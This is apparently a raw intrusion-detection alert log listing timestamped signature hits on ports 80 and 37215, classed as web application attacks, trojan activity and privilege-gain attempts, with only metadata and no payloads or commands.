              Timestamp:06/01/24-18:15:55.272625
              SID:2025883
              Source Port:34184
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.241529
              SID:2030092
              Source Port:58654
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252244
              SID:2829579
              Source Port:48832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252468
              SID:2835222
              Source Port:45594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.306780
              SID:2829579
              Source Port:50380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.272559
              SID:2030092
              Source Port:55190
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.245386
              SID:2030092
              Source Port:54684
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.307739
              SID:2829579
              Source Port:41044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.244182
              SID:2030092
              Source Port:56476
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246558
              SID:2030092
              Source Port:40260
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.308432
              SID:2835222
              Source Port:59848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246394
              SID:2025883
              Source Port:33772
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.238030
              SID:2030092
              Source Port:55740
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.264769
              SID:2030092
              Source Port:48562
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.305831
              SID:2829579
              Source Port:42754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260455
              SID:2829579
              Source Port:41000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251572
              SID:2829579
              Source Port:45586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.259765
              SID:2835222
              Source Port:55908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.259281
              SID:2835222
              Source Port:44494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274702
              SID:2835222
              Source Port:52758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.241794
              SID:2030092
              Source Port:57298
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.245630
              SID:2025883
              Source Port:49634
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.254930
              SID:2030092
              Source Port:55984
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275705
              SID:2829579
              Source Port:51478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.255231
              SID:2030092
              Source Port:44092
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.209240
              SID:2030092
              Source Port:58314
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.256025
              SID:2835222
              Source Port:34408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239961
              SID:2030092
              Source Port:38194
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241765
              SID:2030092
              Source Port:50824
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254304
              SID:2835222
              Source Port:38486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239377
              SID:2030092
              Source Port:37288
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.256774
              SID:2829579
              Source Port:54536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.254790
              SID:2030092
              Source Port:39154
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253083
              SID:2829579
              Source Port:55144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.255297
              SID:2025883
              Source Port:51122
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.252942
              SID:2829579
              Source Port:44394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.259918
              SID:2835222
              Source Port:60760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.254886
              SID:2025883
              Source Port:59050
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.253661
              SID:2835222
              Source Port:55562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.255441
              SID:2030092
              Source Port:50510
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.251427
              SID:2829579
              Source Port:40714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267432
              SID:2030092
              Source Port:56660
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.307255
              SID:2835222
              Source Port:35724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.306811
              SID:2829579
              Source Port:46756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.237997
              SID:2030092
              Source Port:60788
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.273711
              SID:2829579
              Source Port:37362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251665
              SID:2829579
              Source Port:43196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266961
              SID:2030092
              Source Port:42318
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.266286
              SID:2030092
              Source Port:49578
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.267784
              SID:2030092
              Source Port:48642
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.272091
              SID:2025883
              Source Port:33304
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.266766
              SID:2030092
              Source Port:37100
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.308066
              SID:2835222
              Source Port:57036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251517
              SID:2835222
              Source Port:52998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254927
              SID:2835222
              Source Port:46710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255235
              SID:2829579
              Source Port:40978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255840
              SID:2835222
              Source Port:44038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274432
              SID:2829579
              Source Port:38934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261573
              SID:2829579
              Source Port:60606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275211
              SID:2835222
              Source Port:32910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.247144
              SID:2030092
              Source Port:44808
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.306047
              SID:2835222
              Source Port:46258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.240412
              SID:2025883
              Source Port:35516
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.239076
              SID:2025883
              Source Port:33318
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.307866
              SID:2835222
              Source Port:57742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239370
              SID:2025883
              Source Port:50474
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.245225
              SID:2030092
              Source Port:45024
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.255180
              SID:2025883
              Source Port:32818
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.287102
              SID:2030092
              Source Port:46430
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.239856
              SID:2030092
              Source Port:54416
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.244111
              SID:2025883
              Source Port:53508
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.305747
              SID:2829579
              Source Port:33730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266749
              SID:2030092
              Source Port:36502
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.240081
              SID:2025883
              Source Port:33834
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.246172
              SID:2025883
              Source Port:58268
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.254354
              SID:2835222
              Source Port:60452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.252900
              SID:2829579
              Source Port:39892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256857
              SID:2835222
              Source Port:57300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253587
              SID:2829579
              Source Port:58096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.245550
              SID:2030092
              Source Port:41354
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.237923
              SID:2025883
              Source Port:58546
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.253703
              SID:2829579
              Source Port:37980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.247238
              SID:2030092
              Source Port:43374
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.252848
              SID:2829579
              Source Port:45532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.244374
              SID:2025883
              Source Port:38836
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.256278
              SID:2829579
              Source Port:37590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.246983
              SID:2025883
              Source Port:57912
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.233612
              SID:2835222
              Source Port:47420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.244662
              SID:2025883
              Source Port:52258
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.239201
              SID:2030092
              Source Port:44888
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.244458
              SID:2025883
              Source Port:46316
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.260926
              SID:2835222
              Source Port:54010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.287981
              SID:2835222
              Source Port:39772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239637
              SID:2030092
              Source Port:45958
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.308318
              SID:2829579
              Source Port:45824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.306669
              SID:2829579
              Source Port:52088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238560
              SID:2030092
              Source Port:43196
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.266672
              SID:2030092
              Source Port:56944
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.238730
              SID:2030092
              Source Port:52794
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241078
              SID:2030092
              Source Port:55216
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.254555
              SID:2025883
              Source Port:34994
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.287130
              SID:2030092
              Source Port:47654
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.239991
              SID:2025883
              Source Port:32914
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.265357
              SID:2030092
              Source Port:49782
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.266992
              SID:2030092
              Source Port:45778
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.237801
              SID:2030092
              Source Port:50616
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.272495
              SID:2030092
              Source Port:45794
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.245577
              SID:2025883
              Source Port:52106
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.240757
              SID:2025883
              Source Port:56784
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.265177
              SID:2030092
              Source Port:58618
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.224351
              SID:2030092
              Source Port:47646
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.268163
              SID:2030092
              Source Port:37028
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.307148
              SID:2829579
              Source Port:37048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307479
              SID:2829579
              Source Port:60150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.262015
              SID:2829579
              Source Port:34410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.237678
              SID:2025883
              Source Port:37034
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.258791
              SID:2835222
              Source Port:39256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.268455
              SID:2030092
              Source Port:39326
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.238640
              SID:2025883
              Source Port:53032
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.239572
              SID:2025883
              Source Port:50710
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.253777
              SID:2835222
              Source Port:52106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.251906
              SID:2829579
              Source Port:33272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.239887
              SID:2030092
              Source Port:54180
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.261023
              SID:2829579
              Source Port:57540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.241554
              SID:2030092
              Source Port:43640
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.268308
              SID:2030092
              Source Port:39704
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.263326
              SID:2829579
              Source Port:60588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267551
              SID:2030092
              Source Port:35132
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.246833
              SID:2025883
              Source Port:47804
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.261791
              SID:2835222
              Source Port:52352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274390
              SID:2835222
              Source Port:46806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.238712
              SID:2030092
              Source Port:39940
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.240074
              SID:2025883
              Source Port:38306
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.265008
              SID:2030092
              Source Port:47246
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241218
              SID:2025883
              Source Port:32800
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.239112
              SID:2025883
              Source Port:53466
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:53.247268
              SID:2025883
              Source Port:47738
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.241602
              SID:2030092
              Source Port:37588
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275058
              SID:2829579
              Source Port:51176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.244800
              SID:2030092
              Source Port:47080
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246953
              SID:2025883
              Source Port:48018
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.275742
              SID:2835222
              Source Port:60068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307512
              SID:2835222
              Source Port:54276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.254086
              SID:2829579
              Source Port:49882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.273948
              SID:2829579
              Source Port:47462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255942
              SID:2835222
              Source Port:42316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.238457
              SID:2030092
              Source Port:44104
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.244879
              SID:2025883
              Source Port:44768
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.288050
              SID:2829579
              Source Port:53540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.272743
              SID:2030092
              Source Port:38762
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254890
              SID:2829579
              Source Port:60608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275319
              SID:2829579
              Source Port:40920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260639
              SID:2835222
              Source Port:49868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307292
              SID:2835222
              Source Port:49158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.267822
              SID:2030092
              Source Port:55206
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.306153
              SID:2835222
              Source Port:59834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260266
              SID:2835222
              Source Port:50294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.261955
              SID:2829579
              Source Port:47172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.253439
              SID:2829579
              Source Port:39642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.245947
              SID:2025883
              Source Port:52912
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.308362
              SID:2835222
              Source Port:35150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240394
              SID:2030092
              Source Port:49442
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:55.261422
              SID:2835222
              Source Port:41992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239986
              SID:2025883
              Source Port:44968
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:55.261750
              SID:2835222
              Source Port:49726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.240582
              SID:2030092
              Source Port:40758
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.273986
              SID:2835222
              Source Port:48062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.259667
              SID:2835222
              Source Port:53642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.260163
              SID:2835222
              Source Port:37114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275438
              SID:2835222
              Source Port:50042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.263159
              SID:2835222
              Source Port:42834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.255707
              SID:2835222
              Source Port:51746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.247444
              SID:2030092
              Source Port:38426
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:53.241044
              SID:2025883
              Source Port:45540
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:56.287929
              SID:2835222
              Source Port:36728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.306870
              SID:2835222
              Source Port:49334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.238770
              SID:2030092
              Source Port:58574
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.253358
              SID:2829579
              Source Port:52420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.256207
              SID:2835222
              Source Port:45658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.255002
              SID:2030092
              Source Port:55288
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246697
              SID:2025883
              Source Port:55516
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.253978
              SID:2829579
              Source Port:33038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.275830
              SID:2835222
              Source Port:40262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.308033
              SID:2835222
              Source Port:46284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:56.307898
              SID:2835222
              Source Port:54184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239670
              SID:2030092
              Source Port:54808
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.275552
              SID:2835222
              Source Port:58124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.239777
              SID:2030092
              Source Port:49860
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.255200
              SID:2835222
              Source Port:56718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274132
              SID:2835222
              Source Port:38926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:54.274295
              SID:2835222
              Source Port:36022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.259394
              SID:2835222
              Source Port:46300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.238818
              SID:2030092
              Source Port:34108
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.274630
              SID:2835222
              Source Port:60168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:53.237569
              SID:2030092
              Source Port:42174
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:54.254666
              SID:2829579
              Source Port:38622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/01/24-18:15:55.266473
              SID:2030092
              Source Port:52190
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/01/24-18:15:56.246505
              SID:2025883
              Source Port:52478
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/01/24-18:15:54.237960
              SID:2025883
              Source Port:41606
              Destination Port:80
              Protocol:TCP
